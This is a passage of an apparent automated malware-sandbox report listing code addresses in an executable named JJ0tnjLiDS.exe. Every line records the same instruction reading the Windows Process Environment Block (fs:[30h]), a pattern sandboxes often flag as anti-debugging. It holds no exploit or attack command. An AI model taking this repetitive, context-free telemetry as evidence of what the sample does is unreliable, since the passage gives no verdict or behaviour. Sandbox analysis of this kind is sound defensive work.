              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4260 mov eax, dword ptr fs:[00000030h]0_2_010C4260
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4260 mov eax, dword ptr fs:[00000030h]0_2_010C4260
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4260 mov eax, dword ptr fs:[00000030h]0_2_010C4260
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE284 mov eax, dword ptr fs:[00000030h]0_2_010FE284
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE284 mov eax, dword ptr fs:[00000030h]0_2_010FE284
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01140283 mov eax, dword ptr fs:[00000030h]0_2_01140283
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01140283 mov eax, dword ptr fs:[00000030h]0_2_01140283
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01140283 mov eax, dword ptr fs:[00000030h]0_2_01140283
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D02A0 mov eax, dword ptr fs:[00000030h]0_2_010D02A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D02A0 mov eax, dword ptr fs:[00000030h]0_2_010D02A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011562A0 mov eax, dword ptr fs:[00000030h]0_2_011562A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011562A0 mov ecx, dword ptr fs:[00000030h]0_2_011562A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011562A0 mov eax, dword ptr fs:[00000030h]0_2_011562A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011562A0 mov eax, dword ptr fs:[00000030h]0_2_011562A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011562A0 mov eax, dword ptr fs:[00000030h]0_2_011562A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011562A0 mov eax, dword ptr fs:[00000030h]0_2_011562A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA2C3 mov eax, dword ptr fs:[00000030h]0_2_010CA2C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA2C3 mov eax, dword ptr fs:[00000030h]0_2_010CA2C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA2C3 mov eax, dword ptr fs:[00000030h]0_2_010CA2C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA2C3 mov eax, dword ptr fs:[00000030h]0_2_010CA2C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA2C3 mov eax, dword ptr fs:[00000030h]0_2_010CA2C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011962D6 mov eax, dword ptr fs:[00000030h]0_2_011962D6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D02E1 mov eax, dword ptr fs:[00000030h]0_2_010D02E1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D02E1 mov eax, dword ptr fs:[00000030h]0_2_010D02E1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D02E1 mov eax, dword ptr fs:[00000030h]0_2_010D02E1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156500 mov eax, dword ptr fs:[00000030h]0_2_01156500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8550 mov eax, dword ptr fs:[00000030h]0_2_010C8550
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8550 mov eax, dword ptr fs:[00000030h]0_2_010C8550
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F656A mov eax, dword ptr fs:[00000030h]0_2_010F656A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F656A mov eax, dword ptr fs:[00000030h]0_2_010F656A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F656A mov eax, dword ptr fs:[00000030h]0_2_010F656A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F4588 mov eax, dword ptr fs:[00000030h]0_2_010F4588
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2582 mov eax, dword ptr fs:[00000030h]0_2_010C2582
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2582 mov ecx, dword ptr fs:[00000030h]0_2_010C2582
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE59C mov eax, dword ptr fs:[00000030h]0_2_010FE59C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011405A7 mov eax, dword ptr fs:[00000030h]0_2_011405A7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011405A7 mov eax, dword ptr fs:[00000030h]0_2_011405A7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011405A7 mov eax, dword ptr fs:[00000030h]0_2_011405A7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E45B1 mov eax, dword ptr fs:[00000030h]0_2_010E45B1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E45B1 mov eax, dword ptr fs:[00000030h]0_2_010E45B1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE5CF mov eax, dword ptr fs:[00000030h]0_2_010FE5CF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE5CF mov eax, dword ptr fs:[00000030h]0_2_010FE5CF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C65D0 mov eax, dword ptr fs:[00000030h]0_2_010C65D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA5D0 mov eax, dword ptr fs:[00000030h]0_2_010FA5D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA5D0 mov eax, dword ptr fs:[00000030h]0_2_010FA5D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC5ED mov eax, dword ptr fs:[00000030h]0_2_010FC5ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC5ED mov eax, dword ptr fs:[00000030h]0_2_010FC5ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C25E0 mov eax, dword ptr fs:[00000030h]0_2_010C25E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8402 mov eax, dword ptr fs:[00000030h]0_2_010F8402
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8402 mov eax, dword ptr fs:[00000030h]0_2_010F8402
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8402 mov eax, dword ptr fs:[00000030h]0_2_010F8402
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE420 mov eax, dword ptr fs:[00000030h]0_2_010BE420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE420 mov eax, dword ptr fs:[00000030h]0_2_010BE420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE420 mov eax, dword ptr fs:[00000030h]0_2_010BE420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BC427 mov eax, dword ptr fs:[00000030h]0_2_010BC427
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA430 mov eax, dword ptr fs:[00000030h]0_2_010FA430
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117A456 mov eax, dword ptr fs:[00000030h]0_2_0117A456
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E245A mov eax, dword ptr fs:[00000030h]0_2_010E245A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B645D mov eax, dword ptr fs:[00000030h]0_2_010B645D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C460 mov ecx, dword ptr fs:[00000030h]0_2_0114C460
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EA470 mov eax, dword ptr fs:[00000030h]0_2_010EA470
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EA470 mov eax, dword ptr fs:[00000030h]0_2_010EA470
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EA470 mov eax, dword ptr fs:[00000030h]0_2_010EA470
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117A49A mov eax, dword ptr fs:[00000030h]0_2_0117A49A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114A4B0 mov eax, dword ptr fs:[00000030h]0_2_0114A4B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C64AB mov eax, dword ptr fs:[00000030h]0_2_010C64AB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F44B0 mov ecx, dword ptr fs:[00000030h]0_2_010F44B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C04E5 mov ecx, dword ptr fs:[00000030h]0_2_010C04E5
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC700 mov eax, dword ptr fs:[00000030h]0_2_010FC700
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0710 mov eax, dword ptr fs:[00000030h]0_2_010C0710
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F0710 mov eax, dword ptr fs:[00000030h]0_2_010F0710
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113C730 mov eax, dword ptr fs:[00000030h]0_2_0113C730
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC720 mov eax, dword ptr fs:[00000030h]0_2_010FC720
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC720 mov eax, dword ptr fs:[00000030h]0_2_010FC720
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F273C mov eax, dword ptr fs:[00000030h]0_2_010F273C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F273C mov ecx, dword ptr fs:[00000030h]0_2_010F273C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F273C mov eax, dword ptr fs:[00000030h]0_2_010F273C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102750 mov eax, dword ptr fs:[00000030h]0_2_01102750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102750 mov eax, dword ptr fs:[00000030h]0_2_01102750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01144755 mov eax, dword ptr fs:[00000030h]0_2_01144755
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F674D mov esi, dword ptr fs:[00000030h]0_2_010F674D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F674D mov eax, dword ptr fs:[00000030h]0_2_010F674D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F674D mov eax, dword ptr fs:[00000030h]0_2_010F674D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E75D mov eax, dword ptr fs:[00000030h]0_2_0114E75D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0750 mov eax, dword ptr fs:[00000030h]0_2_010C0750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8770 mov eax, dword ptr fs:[00000030h]0_2_010C8770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116678E mov eax, dword ptr fs:[00000030h]0_2_0116678E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C07AF mov eax, dword ptr fs:[00000030h]0_2_010C07AF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011747A0 mov eax, dword ptr fs:[00000030h]0_2_011747A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CC7C0 mov eax, dword ptr fs:[00000030h]0_2_010CC7C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011407C3 mov eax, dword ptr fs:[00000030h]0_2_011407C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E27ED mov eax, dword ptr fs:[00000030h]0_2_010E27ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E27ED mov eax, dword ptr fs:[00000030h]0_2_010E27ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E27ED mov eax, dword ptr fs:[00000030h]0_2_010E27ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E7E1 mov eax, dword ptr fs:[00000030h]0_2_0114E7E1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C47FB mov eax, dword ptr fs:[00000030h]0_2_010C47FB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C47FB mov eax, dword ptr fs:[00000030h]0_2_010C47FB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102619 mov eax, dword ptr fs:[00000030h]0_2_01102619
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E609 mov eax, dword ptr fs:[00000030h]0_2_0113E609
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C262C mov eax, dword ptr fs:[00000030h]0_2_010C262C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE627 mov eax, dword ptr fs:[00000030h]0_2_010DE627
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F6620 mov eax, dword ptr fs:[00000030h]0_2_010F6620
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8620 mov eax, dword ptr fs:[00000030h]0_2_010F8620
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DC640 mov eax, dword ptr fs:[00000030h]0_2_010DC640
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA660 mov eax, dword ptr fs:[00000030h]0_2_010FA660
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA660 mov eax, dword ptr fs:[00000030h]0_2_010FA660
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118866E mov eax, dword ptr fs:[00000030h]0_2_0118866E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118866E mov eax, dword ptr fs:[00000030h]0_2_0118866E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F2674 mov eax, dword ptr fs:[00000030h]0_2_010F2674
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4690 mov eax, dword ptr fs:[00000030h]0_2_010C4690
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4690 mov eax, dword ptr fs:[00000030h]0_2_010C4690
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC6A6 mov eax, dword ptr fs:[00000030h]0_2_010FC6A6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F66B0 mov eax, dword ptr fs:[00000030h]0_2_010F66B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]0_2_010FA6C7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA6C7 mov eax, dword ptr fs:[00000030h]0_2_010FA6C7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011406F1 mov eax, dword ptr fs:[00000030h]0_2_011406F1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011406F1 mov eax, dword ptr fs:[00000030h]0_2_011406F1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C912 mov eax, dword ptr fs:[00000030h]0_2_0114C912
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8918 mov eax, dword ptr fs:[00000030h]0_2_010B8918
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8918 mov eax, dword ptr fs:[00000030h]0_2_010B8918
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E908 mov eax, dword ptr fs:[00000030h]0_2_0113E908
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E908 mov eax, dword ptr fs:[00000030h]0_2_0113E908
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114892A mov eax, dword ptr fs:[00000030h]0_2_0114892A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0115892B mov eax, dword ptr fs:[00000030h]0_2_0115892B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01140946 mov eax, dword ptr fs:[00000030h]0_2_01140946
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194940 mov eax, dword ptr fs:[00000030h]0_2_01194940
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C97C mov eax, dword ptr fs:[00000030h]0_2_0114C97C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E6962 mov eax, dword ptr fs:[00000030h]0_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E6962 mov eax, dword ptr fs:[00000030h]0_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E6962 mov eax, dword ptr fs:[00000030h]0_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01164978 mov eax, dword ptr fs:[00000030h]0_2_01164978
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01164978 mov eax, dword ptr fs:[00000030h]0_2_01164978
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E mov eax, dword ptr fs:[00000030h]0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E mov edx, dword ptr fs:[00000030h]0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E mov eax, dword ptr fs:[00000030h]0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C09AD mov eax, dword ptr fs:[00000030h]0_2_010C09AD
